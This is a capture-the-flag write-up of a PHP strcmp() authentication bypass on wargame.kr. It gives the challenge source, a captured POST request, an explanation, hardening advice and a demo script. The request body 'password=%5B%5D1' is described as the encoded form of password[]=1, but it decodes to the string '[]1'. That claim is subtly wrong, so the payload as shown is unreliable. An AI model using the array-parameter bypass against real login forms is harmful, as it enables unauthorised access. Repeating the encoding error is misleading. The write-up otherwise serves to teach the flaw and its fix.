Web Form Bypass Note
1. strcmp bypass
http://wargame.kr:8080/strcmp/
...
$password = sha1(md5(rand().file_get_contents("/var/lib/dummy_file")).rand()); // unguessable secret
if (isset($_GET['view-source'])) {
    show_source(__FILE__);
    exit();
} else if (isset($_POST['password'])) {
    sleep(1); // do not brute force!
    // Loose comparison (==): if $_POST['password'] is an array, strcmp()
    // returns NULL with a warning on PHP 5/7, and NULL == 0 is true.
    if (strcmp($_POST['password'], $password) == 0) {
        echo "Congratulations! Flag is <b>" . auth_code("strcmp") . "</b>";
        exit();
    } else {
        echo "Wrong password..";
    }
}
HTTP request:
POST http://wargame.kr:8080/strcmp/ HTTP/1.1
Host: wargame.kr:8080
Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Origin: http://wargame.kr:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://wargame.kr:8080/strcmp/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ja;q=0.8
Cookie: PHPSESSID=pmn3gck...(omitted)

password=%5B%5D1
To bypass PHP's strcmp(), send the parameter as an array instead of a string: change password=value in the request body to password[]=value (URL-encoded as password=%5B%5D1 above). PHP then builds $_POST['password'] as an array. On PHP 5 and 7, strcmp() with a non-string argument only emits a warning and returns NULL, and the loose comparison NULL == 0 is true, so the check passes with a single request; the sleep(1) anti-brute-force delay is irrelevant because no guessing is needed. On PHP 8, strcmp() throws a TypeError for an array argument, so this trick no longer works there. The fix is to reject non-string input with is_string() and compare with === or hash_equals() rather than ==.
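The following is an added example, not code from the challenge, that isolates the vulnerable comparison and runs it against the three kinds of value PHP would place in $_POST['password'] (a wrong string, the array produced by password[]=1, and the correct string), beside a hardened check. The secret is a constructed stand-in for the challenge's sha1(md5(...)) value; the function names vulnerable_check and hardened_check are this example's own.

```php
<?php
// Added example (not part of the original challenge code): simulate the
// strcmp() == 0 check with a string parameter and with an array parameter.

// Constructed stand-in for the challenge's unguessable secret.
$password = sha1('constructed-secret');

// The challenge's check, isolated: loose (==) comparison of strcmp()'s result.
function vulnerable_check($input, string $password): bool
{
    // PHP 5/7: strcmp() on a non-string emits a warning (suppressed here)
    // and returns NULL; NULL == 0 is true, so an array parameter passes.
    // PHP 8: strcmp() throws a TypeError instead, which we treat as failure.
    try {
        return @strcmp($input, $password) == 0;
    } catch (TypeError $e) {
        return false;
    }
}

// Hardened check: refuse anything that is not a string, then compare with
// hash_equals(), which is type-safe and constant-time.
function hardened_check($input, string $password): bool
{
    if (!is_string($input)) {
        return false;
    }
    return hash_equals($password, $input);
}

// Constructed request bodies and the value PHP would build into $_POST['password'].
$cases = [
    'password=wrong'  => 'wrong',     // ordinary wrong guess
    'password[]=1'    => ['1'],       // password=%5B%5D1 from the note above
    'password=<real>' => $password,   // correct value, for reference
];

foreach ($cases as $body => $value) {
    printf("%-18s vulnerable=%s hardened=%s\n",
        $body,
        vulnerable_check($value, $password) ? 'PASS' : 'fail',
        hardened_check($value, $password) ? 'PASS' : 'fail');
}
```

Run it with the PHP CLI (php strcmp_bypass.php). On PHP 5 or 7 the password[]=1 row shows the vulnerable check passing while the hardened one fails; on PHP 8 both fail for the array case because strcmp() throws a TypeError, which is why the bypass in this note depends on the server's PHP version.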